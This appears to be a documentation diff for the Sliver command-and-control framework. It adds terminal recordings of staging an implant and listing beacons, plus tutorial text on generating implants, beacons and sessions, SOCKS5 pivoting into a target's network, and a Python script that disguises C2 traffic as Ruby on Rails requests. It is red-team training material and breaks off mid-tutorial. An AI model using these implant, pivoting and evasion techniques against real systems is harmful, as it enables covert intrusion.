+[4.567389, "o", "t"] +[4.992099, "o", "/"] +[6.556535, "o", "h"] +[6.685184, "o", "e"] +[6.791546, "o", "l"] +[6.965007, "o", "l"] +[7.19011, "o", "o"] +[8.025322, "o", "."] +[8.620806, "o", "y"] +[9.035824, "o", "m"] +[9.546472, "o", "l"] +[10.726299, "o", "?"] +[11.19839, "o", "z"] +[11.65921, "o", "="] +[13.029521, "o", "1"] +[13.43651, "o", "9"] +[13.793109, "o", "7"] +[13.949113, "o", "7"] +[14.128955, "o", "8"] +[14.900212, "o", "\r\n\u001b[?2004l\r"] +[15.009931, "o", "Warning: "] +[15.010494, "o", "Binary output can mess up your terminal. Use \"--output -\" to tell \r\nWarning: curl to output it to your terminal anyway, or consider \"--output \r\nWarning: \" to save to a file.\r\n"] +[15.021725, "o", "\u001b[?2004h"] +[15.021852, "o", "root@98df0494f659:~# "] +[16.959808, "o", "curl http://localhost/hello.yml?z=19778"] +[17.486287, "o", "\b"] +[17.619754, "o", "\b"] +[18.277424, "o", "a78\b\b"] +[18.280088, "o", "l78\b\b"] +[18.342078, "o", "s78\b\b"] +[18.371445, "o", "k78\b\b"] +[18.38078, "o", "j78\b\b"] +[18.411096, "o", "d78\b\b"] +[18.424821, "o", "f78\b\b"] +[18.438786, "o", "h78\b\b"] +[18.561807, "o", "a78\b\b"] +[18.589191, "o", "s78\b\b"] +[18.610773, "o", "dl78\b\b"] +[18.626257, "o", "k78\b\b"] +[18.639979, "o", "j78\b\b"] +[18.719362, "o", "fh78\b\b"] +[20.067454, "o", "\r\n"] +[20.06889, "o", "\u001b[?2004l\r"] +[20.165016, "o", "Warning: "] +[20.165474, "o", "Binary output can mess up your terminal. Use \"--output -\" to tell \r\nWarning: curl to output it to your terminal anyway, or consider \"--output \r\nWarning: \" to save to a file.\r\n"] +[20.17545, "o", "\u001b[?2004hroot@98df0494f659:~# "] +[20.925236, "o", "curl http://localhost/hello.yml?z=197alskjdfhasdlkjfh78"] +[21.365164, "o", "\b"] +[21.563292, "o", "\b"] +[21.742197, "o", "\b"] +[21.966154, "o", "\b\u001b[1Ph78\b\b\b"] +[22.471279, "o", "\b\u001b[1Ph78\b\b\b"] +[22.552271, "o", "\b\u001b[1Ph78\b\b\b"] +[22.631786, "o", "\b\u001b[1Ph78\b\b\b"] +[22.721099, "o", "\b\u001b[1Ph78\b\b\b"] +[22.807704, "o", "\b\u001b[1Ph78\b\b\b"] +[22.887112, "o", "\b\u001b[1Ph78\b\b\b"] +[22.968836, "o", "\u001b[1P78\b\b\b"] +[23.053591, "o", "\b\u001b[1Ph78\b\b\b"] +[23.133644, "o", "\b\u001b[1Ph78\b\b\b"] +[23.221294, "o", "\b\u001b[1Ph78\b\b\b"] +[23.627041, "o", "1h78\b\b\b"] +[24.335876, "o", "\r\n\u001b[?2004l\r"] +[24.441387, "o", "\u001b[?2004hroot@98df0494f659:~# "] +[27.241376, "o", "\u001b[?2004l\r\r\nexit\r\n"] diff --git a/docs/sliver-docs/public/asciinema/stage_implant.cast b/docs/sliver-docs/public/asciinema/stage_implant.cast new file mode 100644 index 0000000000..d84ed57ab7 --- /dev/null +++ b/docs/sliver-docs/public/asciinema/stage_implant.cast @@ -0,0 +1,163 @@ +{"version": 2, "width": 214, "height": 53, "timestamp": 1714671619, "env": {"SHELL": null, "TERM": "xterm"}} +[0.035197, "o", "# "] +[1.42873, "o", "."] +[1.48696, "o", "/"] +[1.606489, "o", "s"] +[1.767933, "o", "l"] +[1.846352, "o", "i"] +[2.427611, "o", "v"] +[2.56474, "o", "e"] +[2.650025, "o", "r"] +[2.744926, "o", "-"] +[2.861713, "o", "s"] +[2.937286, "o", "e"] +[2.972338, "o", "r"] +[3.153342, "o", "v"] +[3.275743, "o", "e"] +[3.343844, "o", "r"] +[3.458348, "o", "\r\n"] +[4.72134, "o", "\u001b[1m\u001b[37m\r\r\n.------..------..------..------..------..------.\r\r\n|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |\r\r\n| :/\\: || :/\\: || (\\/) || :(): || (\\/) || :(): |\r\r\n| :\\/: || (__) || :\\/: || ()() || :\\/: || ()() |\r\r\n| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|\r\r\n`------'`------'`------'`------'`------'`------'\r\r\n\u001b[0m\r\nAll hackers gain cipher\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - ba3893980d1ca5e4ae4089eb4c87e9f5ba389119 - \u001b[1mDirty\u001b[0m\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n\r\n"] +[4.749277, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[4.751226, "o", "\u001b[1 q"] +[4.753544, "o", "\u001b[?25l"] +[4.753975, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.760322, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[4.760971, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C"] +[4.761776, "o", "\u001b[214D\u001b[9C\u001b[?25h"] +[5.79902, "o", "\u001b[?25l"] +[5.803843, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.83293, "o", "i\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[5.833324, "o", "\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[5.88572, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.88631, "o", "\u001b[6n"] +[5.897688, "o", "im\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[5.898349, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[6.03, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.043073, "o", "imp\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[6.046111, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[6.091735, "o", "\u001b[?25l"] +[6.093705, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.105412, "o", "impl\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[6.105982, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[6.186028, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[6.186264, "o", "\u001b[6n"] +[6.190996, "o", "impla\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[14D\u001b[9C\u001b[214D\u001b[14C\u001b[?25h"] +[6.343665, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.358766, "o", "implan\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[6.359008, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[15D\u001b[9C\u001b[214D\u001b[15C\u001b[?25h"] +[6.448257, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[6.458297, "o", "\u001b[6n"] +[6.476822, "o", "implant\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[6.477123, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[16D\u001b[9C\u001b[214D\u001b[16C\u001b[?25h"] +[6.503454, "o", "\u001b[?25l"] +[6.504386, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.508097, "o", "\u001b[1m\u001b[32mimplants\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[17D\u001b[9C\u001b[214D\u001b[17C\u001b[?25h"] +[6.690314, "o", "\u001b[17D\u001b[9C"] +[6.694088, "o", "\u001b[6n"] +[6.703296, "o", "\u001b[214D\u001b[17C"] +[6.704242, "o", "\u001b[0J\u001b[214D\r\r\n"] +[6.710002, "o", "\u001b[0 q\r\n"] +[6.757913, "o", " Name Implant Type Template OS/Arch Format Command & Control Debug C2 Config ID Stage \r\n================= ============== ========== ============= ============ ======================= ======= =========== ======= =======\r\n ASHAMED_WHISKEY beacon sliver linux/amd64 EXECUTABLE [1] https://localhost true ruby 19778 false \r\n"] +[6.758229, "o", "\r\n\r\n\r\n"] +[6.780643, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[6.781765, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.790649, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[6.791286, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[7.761701, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.779716, "o", "i\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D"] +[7.779944, "o", "\u001b[10C\u001b[?25h"] +[7.877287, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.885785, "o", "im\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C"] +[7.887998, "o", "\u001b[214D\u001b[11C\u001b[?25h"] +[7.993993, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.001938, "o", "imp\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[8.003372, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[8.071363, "o", "\u001b[?25l"] +[8.073826, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.092704, "o", "impl\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[8.093891, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[8.181791, "o", "\u001b[1 q"] +[8.226101, "o", "\u001b[1 q"] +[8.226406, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.231665, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[8.233017, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[18D\u001b[9C\u001b[214D\u001b[18C\u001b[?25h"] +[8.77321, "o", "\u001b[?25l\u001b[214D"] +[8.775494, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.80576, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22ms\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[19D\u001b[9C\u001b[214D\u001b[19C\u001b[?25h"] +[8.908774, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.923291, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22mst\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[20D\u001b[9C"] +[8.923497, "o", "\u001b[214D\u001b[20C\u001b[?25h"] +[9.051215, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[9.064616, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22msta\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[21D\u001b[9C\u001b[214D\u001b[21C\u001b[?25h"] +[9.258989, "o", "\u001b[?25l\u001b[214D"] +[9.259378, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[9.266662, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22mstag\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[9.267002, "o", "\u001b[214D\u001b[1A\u001b[22D\u001b[9C\u001b[214D\u001b[22C\u001b[?25h"] +[9.312721, "o", "\u001b[?25l\u001b[214D"] +[9.313243, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[9.317735, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22mstage\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[23D\u001b[9C"] +[9.31828, "o", "\u001b[214D\u001b[23C\u001b[?25h"] +[9.874144, "o", "\u001b[23D\u001b[9C"] +[9.875107, "o", "\u001b[6n"] +[9.910314, "o", "\u001b[214D\u001b[23C\u001b[0J"] +[9.91059, "o", "\u001b[214D\r\r\n"] +[9.911676, "o", "\u001b[0 q\r\n"] +[9.940145, "o", "\u001b7"] +[9.940361, "o", "\u001b[?25l\u001b8"] +[9.942012, "o", "\u001b[0G\u001b[2K"] +[9.958944, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect sessions and beacons to expose:\u001b[0m \u001b[0;36m[Use arrows to move, space to select, to all, to none, type to filter]\u001b[0m\r\n\u001b[0;1;36m>\u001b[0m\u001b[0;1;99m [ ] \u001b[0m ASHAMED_WHISKEY\r\n\u001b7"] +[9.960283, "o", "\u001b[1A\u001b[0G"] +[10.704432, "o", "\u001b8\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[10.706793, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect sessions and beacons to expose:\u001b[0m \u001b[0;36m[Use arrows to move, space to select, to all, to none, type to filter]\u001b[0m\r\n\u001b[0;1;36m>\u001b[0m\u001b[0;32m [x] \u001b[0m ASHAMED_WHISKEY\r\n\u001b7"] +[10.708367, "o", "\u001b[1A\u001b[0G"] +[11.504772, "o", "\u001b8\u001b[?25h\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[11.511953, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect sessions and beacons to expose:\u001b[0m\u001b[0;36m ASHAMED_WHISKEY\u001b[0m\r\n"] +[11.535808, "o", "\r\n"] +[11.551312, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[11.551645, "o", "\u001b[1 q"] +[11.553114, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[11.553423, "o", "\u001b[6n"] +[11.56914, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.570881, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[13.532974, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[13.55087, "o", "i\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[13.552653, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[13.63132, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[13.631999, "o", "\u001b[6n"] +[13.637145, "o", "im\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[13.721062, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[13.731059, "o", "imp\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C"] +[13.731364, "o", "\u001b[214D\u001b[12C\u001b[?25h"] +[13.806009, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[13.817336, "o", "impl\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[13.818071, "o", "\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[13.899054, "o", "\u001b[1 q"] +[13.925017, "o", "\u001b[1 q\u001b[?25l"] +[13.927048, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[13.940489, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[13.941474, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[18D\u001b[9C\u001b[214D\u001b[18C\u001b[?25h"] +[14.332764, "o", "\u001b[18D"] +[14.333879, "o", "\u001b[9C\u001b[6n"] +[14.361829, "o", "\u001b[214D\u001b[18C\u001b[0J\u001b[214D\r\r\n"] +[14.363299, "o", "\u001b[0 q\r\n"] +[14.387987, "o", " Name Implant Type Template OS/Arch Format Command & Control Debug C2 Config ID Stage \r\n================= ============== ========== ============= ============ ======================= ======= =========== ======= =======\r\n ASHAMED_WHISKEY beacon sliver linux/amd64 EXECUTABLE [1] https://localhost true ruby 19778 true \r\n\r\n\r\n\r\n"] +[14.397688, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[14.397879, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[14.400466, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[14.40078, "o", "\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[16.557278, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[16.580738, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[16.807797, "o", "\u001b[?25l"] +[16.809001, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[16.820135, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[16.821114, "o", "\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[16.933404, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[16.945131, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[17.091966, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[17.103693, "o", "\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[17.545196, "o", "\u001b[13D\u001b[9C\u001b[6n"] +[17.563002, "o", "\u001b[214D\u001b[13C\u001b[0J\u001b[214D\r\r\n"] +[17.567814, "o", "\u001b[0 q\r\n"] +[17.579386, "o", "Exiting...\r\n"] +[17.597406, "o", "# "] +[18.913792, "o", "\r\n"] diff --git a/docs/sliver-docs/public/tutorials.json b/docs/sliver-docs/public/tutorials.json index 10b222370f..3da8b8253c 100644 --- a/docs/sliver-docs/public/tutorials.json +++ b/docs/sliver-docs/public/tutorials.json @@ -1 +1 @@ -{"tutorials":[{"name":"1 - Getting Started","content":"This course will use the latest Sliver build, you can download it from [insert local web server].\n\n`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.\n\nFirst time running Sliver will take a couple seconds as its retrieving its dependencies, consecutive executions will be much faster. Go ahead and launch the `sliver-server`.\n\n```asciinema\n{\"src\": \"/asciinema/startup.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nLet's take a couple minutes to discuss what Sliver actually is and how its setup.\n\n![Alt text](/images/Architecture.png)\n\nNow that Sliver is running, lets generate and execute your first implant to try out some of the basic features of Sliver, for now we’re going to run everything on the local host.\n\nHere's what we're going to do: \n* Generate your implant using the `generate` command as shown below.\n* Start HTTP listener on port 80\n* Execute implant in a separate terminal\n\n```asciinema\n{\"src\": \"/asciinema/first-implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nNow let’s select our implant and run our first command using the `use` command.\n\n```bash\n[server] sliver > use\n? Select a session or beacon: \nSESSION 1884a365 RELATED_EARDRUM [::1]:49153 test.local tester darwin/amd64\n[*] Active session RELATED_EARDRUM (1884a365-085f-4506-b28e-80c481730fd0)\n\n[server] sliver (RELATED_EARDRUM) > pwd\n\n[*] /Users/tester/tools\n```\n\nOnce you have reached this point, go ahead and explore some of the commands listed below. In each case first checkout the commands help using the **`-h`** flag then try it out!\n\n```bash\nExploring and interacting with the filesystem\n\nFilesystem\n cat Dump file to stdout\n cd Change directory\n cp Copy a file\n download Download a file\n grep Search for strings that match a regex within a file or directory\n head Grab the first number of bytes or lines from a file\n ls List current directory\n memfiles List current memfiles\n mkdir Make a directory\n mount Get information on mounted filesystems\n mv Move or rename a file\n pwd Print working directory\n rm Remove a file or directory\n tail Grab the last number of bytes or lines from a file\n upload Upload a file\n```\n\n```asciinema\n{\"src\": \"/asciinema/filesystem.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nGetting some environmental information\n```bash\nInfo\n env List environment variables\n getgid Get session process GID\n getpid Get session pid\n getuid Get session process UID\n info Get session info\n ping Send round trip message to implant (does not use ICMP)\n screenshot Take a screenshot\n whoami Get session user execution context\n```\nExecute a binary\n\n```asciinema\n{\"src\": \"/asciinema/execute.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nRunning an interactive shell\n\n```asciinema\n{\"src\": \"/asciinema/shell.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```"},{"name":"2 - Beacons vs Sessions","content":"# Beacons vs Sessions\n\nSliver implants support two types of connections, sessions and beacons.\n\nSessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.\n\nTypically during an engagement you will want to deploy a beacon on the target system, and switch to a session while doing more active enumeration activities.\n\nLet’s start with generating and deploying a beacon using `http`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_generation.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nYou can see the beacon callback times either in the `info` command or using `beacons watch`.\n\n```bash\n[server] sliver > beacons watch\n\n ID Name Transport Username Operating System Last Check-In Next Check-In\n========== =============== =========== ================= ================== =============== ===============\n 942c647c TIRED_GIRAFFE http(s) tester darwin/amd64 52s 12s\n\n```\n\nBeacon callback times and jitter can be set either during generation or on the fly using the `reconfig` command.\n\nThe example below sets the callback time to 5s with a 1s jitter.\n\n```bash\n[server] sliver (TIRED_GIRAFFE) > reconfig -i 5s -j 1s\n\n[*] Tasked beacon TIRED_GIRAFFE (b8aa6fd8)\n\n[+] TIRED_GIRAFFE completed task b8aa6fd8\n\n[*] Reconfigured beacon\n\n[server] sliver (TIRED_GIRAFFE) > info\n\n Beacon ID: 942c647c-8409-4877-9fa2-b84a7f27ad45\n Name: TIRED_GIRAFFE\n Hostname: tester.local\n UUID: c6de1a44-016a-5fbe-b76a-da56af41316d\n Username: tester\n UID: 501\n GID: 20\n PID: 55879\n OS: darwin\n Version:\n Locale:\n Arch: amd64\n Active C2: https://127.0.0.1\n Remote Address: 127.0.0.1:51803\n Proxy URL:\n Interval: 1m0s\n Jitter: 30s\n First Contact: Wed Apr 19 01:14:21 CEST 2023 (10m30s ago)\n Last Checkin: Wed Apr 19 01:18:20 CEST 2023 (6m31s ago)\n Next Checkin: Wed Apr 19 01:19:46 CEST 2023 (5m5s ago)\n```\n\nCommands issued for beacons can be viewed using `tasks`, the task state will indicate wether the command has completed or not. The results of previously run tasks can be viewed using `tasks fetch`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_tasks.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nbeacon_tasks.cast\n\nSession can be spun up using the `interractive` command.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_interractive.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nBecause of the differences between sessions and beacons, certain commands like `upload` or `download` are slower on beacons due to the callback time. Others such as socks5 are not supported and only allowed for sessions. As a rule of thumb anything requiring higher network bandwith should be run from a session.\n\nLet’s switch to our newly created session and spin-up a `socks5` proxy.\n\n```bash\n\nsocks\n[server] sliver (TIRED_GIRAFFE) > use\n\n? Select a session or beacon: SESSION 131a60b9 TIRED_GIRAFFE 127.0.0.1:51969 tester.local tester darwin/amd64\n[*] Active session TIRED_GIRAFFE (131a60b9-db4f-4913-9064-18a17a0f09ab)\n\n[server] sliver (TIRED_GIRAFFE) > socks5 start\n\n[*] Started SOCKS5 127.0.0.1 1081\n⚠️ In-band SOCKS proxies can be a little unstable depending on protocol\n```\n\nYou can then point your browser to port 1081 to tunnel traffic through the implant to your target’s local network.\n\nTry out some of the previous commands and compare behaviour on beacons and sessions. Once you are done, you should remember to close your session using the `close` command.\n"},{"name":"3 - C2 Profiles and configuration","content":"When generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective.\n\nC2 profile configurations can be seen using the `c2profile` command, which also allows import and export features.\n\nThe full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration.\n\nLets imagine we’re trying to breach a customer we've noticed uses ruby-on-rails for their applications. By default sliver will use the following extensions:\n\n- `.woff` for staging\n- `.js` for poll requests\n- `.html` for key exchanges\n- `.png` for close session\n- `.php` for session messages\n\nWe will need to update the session messages and staging with something more realistic and place all references to `woff` or `php` with something less suspicious like `css`, `rb` or `erb`.\n\nWe will also use a list of common Urls and filenames for Ruby on Rails like `https://github.com/danielmiessler/SecLists/blob/master/DiscoveryWeb-Content/ror.txt` for the `*_files` and `*_paths` variables. You could also reuse Urls discovered while enumerating your target's external perimeter in a similar way.\n\nWe will split the urls using a script like the example below, and then update the files and paths variables in our configuration file.\n\n```python\nimport json\nimport math\nimport sys\nimport random\n\n\ndef updateProfile(c2ProfileName, urls, cookieName):\n data = open(urls).readlines()\n c2Profile = open(c2ProfileName, \"r\").read()\n jsonC2Profile = json.loads(c2Profile)\n\n paths, filenames, extensions = [], [], []\n for line in data:\n line = line.strip()\n if \".\" in line:\n extensions.append(line.split(\".\")[-1])\n\n if \"/\" in line:\n segments = line.split(\"/\")\n paths.extend(segments[:-1])\n filenames.append(segments[-1].split(\".\")[0])\n\n extensions = list(set(extensions))\n if \"\" in extensions:\n extensions.remove(\"\")\n random.shuffle(extensions)\n\n filenames = list(set(filenames))\n if \"\" in filenames:\n filenames.remove(\"\")\n\n paths = list(set(paths))\n if \"\" in paths:\n paths.remove(\"\")\n\n if len(extensions) < 5:\n print(f'Got {len(extensions)} extensions, need at least 5.')\n exit(0)\n\n if len(paths) < 5:\n print(f'Got {len(paths)} paths need at least 5.')\n exit(0)\n\n if len(filenames) < 5:\n print(f'Got {len(filenames)} paths need at least 5.')\n exit(0)\n\n exts = ['poll_file_ext','stager_file_ext', 'start_session_file_ext', 'session_file_ext', 'close_file_ext' ]\n for ext in exts:\n jsonC2Profile[\"implant_config\"][ext] = extensions[0]\n extensions.pop(0)\n\n pathTypes = ['poll_paths','stager_paths', 'session_paths', 'close_paths' ]\n for x, pathType in enumerate(pathTypes):\n jsonC2Profile[\"implant_config\"][pathType] = paths[math.floor(x*(len(paths)/len(pathTypes))):math.floor((x+1)*(len(paths)/len(pathTypes)))]\n\n fileTypes = ['poll_files','stager_files', 'session_files', 'close_files']\n for x, fileType in enumerate(fileTypes):\n jsonC2Profile[\"implant_config\"][fileType] = filenames[math.floor(x*(len(filenames)/len(fileTypes))):math.floor((x+1)*(len(filenames)/len(fileTypes)))]\n\n jsonC2Profile[\"server_config\"][\"cookies\"] = [cookieName]\n c2Profile = open(c2ProfileName, \"w\")\n c2Profile.write(json.dumps(jsonC2Profile))\n print(\"C2 Profile updated !\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print(\"Usage: updateProfile.py myC2Profile myurls.txt cookieName\")\n exit(0)\n\n updateProfile(sys.argv[1], sys.argv[2], sys.argv[3])\n```\n\n```asciinema\n{\"src\": \"/asciinema/custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 